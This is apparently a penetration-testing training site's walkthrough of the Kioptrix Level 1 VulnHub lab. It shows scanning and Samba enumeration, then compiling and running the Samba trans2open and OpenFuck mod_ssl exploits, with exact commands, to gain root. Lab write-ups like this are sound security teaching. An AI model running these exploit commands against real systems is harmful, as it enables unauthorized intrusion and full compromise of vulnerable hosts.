Kioptrix: Level 1 - Walkthrough
Kioptrix: Level 1 surfaced on VulnHub on February 17th, 2010. Created by Kioptrix, it can be found at https://www.vulnhub.com/entry/kioptrix-level-1-1,22/. It is the first machine in the Kioptrix series. The objective is to get root privileges and find root's email.
For the attacking machine, I will be using Kali 2017.1.
FREE role-guided training plans
Once booted, this is what the victim machine will look like:
We start the attack by finding the IP of the victim machine by using the netdiscover command:
$ netdiscover
Now that we know our target IP, let's start by scanning the ports and try to get more information about it:
The scan shows us that the following ports are open:
- Port 22 - Running OpenSSH
- Port 80 - Running Apache Web server
- Port 111 - Running RPC
- Port 139 - Running Samba
- Port 443 - Running Apache. We server over ssl
- Port 1024 - Running RPC
Upon visiting the web application (on port 80 via http:// and port 443 via https://) we just see a default Test Page:
Moreover, I did not find anything interesting within their source code as well. Going back to see the services that are being run, Samba is something that interests me. So, I run an enumeration on it:
$ enum4linux -a 172.16.92.138 > output.txt
This gives us a lot of information including the Samba version is being used, 2.2.1a. Upon doing a simple exploit, I see that a Remote Code Execution exploit is available:
$ searchsploit samba 2.2
I copy the exploit to the root directory as exploit.c:
$ cp /usr/share/exploitdb/platforms/linux/remote/10.c exploit.c
then I compile the exploit via gcc:
$ gcc -o samba exploit.c
I am given the final file proper permissions:
$ chmod 755 samba
Let's dry run the exploit and see what all parameters are required:
Okay then, I think we are ready to use this:
$ ./samba -b 0 -c 172.16.92.133 172.16.92.138
And we are in with root privileges! Now we need to find the email.
I found the email under /var/mail:
While playing around it with more, I found that the machine could be exploited another way via Metasploit (CVE-2003-201):
$ use exploit/linux/samba/trans2open
Another way of getting into the machine was via exploit mod_ssl (CVE 2002 - 0082). I found its exploit at https://www.exploit-db.com/exploits/764/
$ gcc -o OpenFuck 746.c -lcrypto
Note: Since the exploit is old, you can update it by following the following tutorial: http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. Also, keep in mind that you will require libssl and libssl-dev before you compile the exploit.
Let's exploit!
$ ./OpenFuck 0x6b 172.16.92.138 443 -c 40
Become a Certified Ethical Hacker, guaranteed!
Get training from anywhere to earn your Certified Ethical Hacker (CEH) Certification — backed with an Exam Pass Guarantee.
In this Series
- Kioptrix: Level 1 - Walkthrough
- Penetration testing steps: How-to guide on pentesting
- How does automated penetration testing work?
- Intelligence-led pentesting and the evolution of Red Team operations
- Red Teaming: Taking advantage of Certify to attack AD networks
- How ethical hacking and pentesting is changing in 2022
- Ransomware penetration testing: Verifying your ransomware readiness
- Red Teaming: Main tools for wireless penetration tests
- Fundamentals of IoT firmware reverse engineering
- Red Teaming: Top tools and gadgets for physical assessments
- Red teaming: Initial access and foothold
- Top tools for red teaming
- What is penetration testing, anyway?
- Red Teaming: Persistence Techniques
- Red Teaming: Credential dumping techniques
- Top 6 bug bounty programs for cybersecurity professionals
- Tunneling and port forwarding tools used during red teaming assessments
- SigintOS: Signal Intelligence via a single graphical interface
- Top tools for mobile android assessments
- Top tools for mobile iOS assessments
- Red Team: C2 frameworks for pentesting
- Inside 1,602 pentests: Common vulnerabilities, findings and fixes
- Red teaming tutorial: Active directory pentesting approach and tools
- Red Team tutorial: A walkthrough on memory injection techniques
- Python for active defense: Monitoring
- Python for active defense: Network
- Python for active defense: Decoys
- How to write a port scanner in Python in 5 minutes: Example and walkthrough
- Using Python for MITRE ATT&CK and data encrypted for impact
- Explore Python for MITRE ATT&CK exfiltration and non-application layer protocol
- Explore Python for MITRE ATT&CK command-and-control
- Explore Python for MITRE ATT&CK email collection and clipboard data
- Explore Python for MITRE ATT&CK lateral movement and remote services
- Explore Python for MITRE ATT&CK account and directory discovery
- Explore Python for MITRE ATT&CK credential access and network sniffing
- Top 10 security tools for bug bounty hunters
- Kali Linux: Top 5 tools for password attacks
- Kali Linux: Top 5 tools for post exploitation
- Kali Linux: Top 5 tools for database security assessments
- Kali Linux: Top 5 tools for information gathering
- Kali Linux: Top 5 tools for sniffing and spoofing
- Kali Linux: Top 8 tools for wireless attacks
- Kali Linux: Top 5 tools for penetration testing reporting
- Kali Linux overview: 14 uses for digital forensics and pentesting
- Top 19 Kali Linux tools for vulnerability assessments
- Explore Python for MITRE ATT&CK persistence
- Explore Python for MITRE ATT&CK defense evasion
- Explore Python for MITRE ATT&CK privilege escalation
- Explore Python for MITRE ATT&CK initial access
- Top 18 tools for vulnerability exploitation in Kali Linux
- Explore Python for MITRE PRE-ATT&CK, network scanning and Scapy
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, ISC2, Cisco, Microsoft and more!
Penetration testing
Penetration testing
Penetration testing
Intelligence-led pentesting and the evolution of Red Team operations
Penetration testing
Red Teaming: Taking advantage of Certify to attack AD networks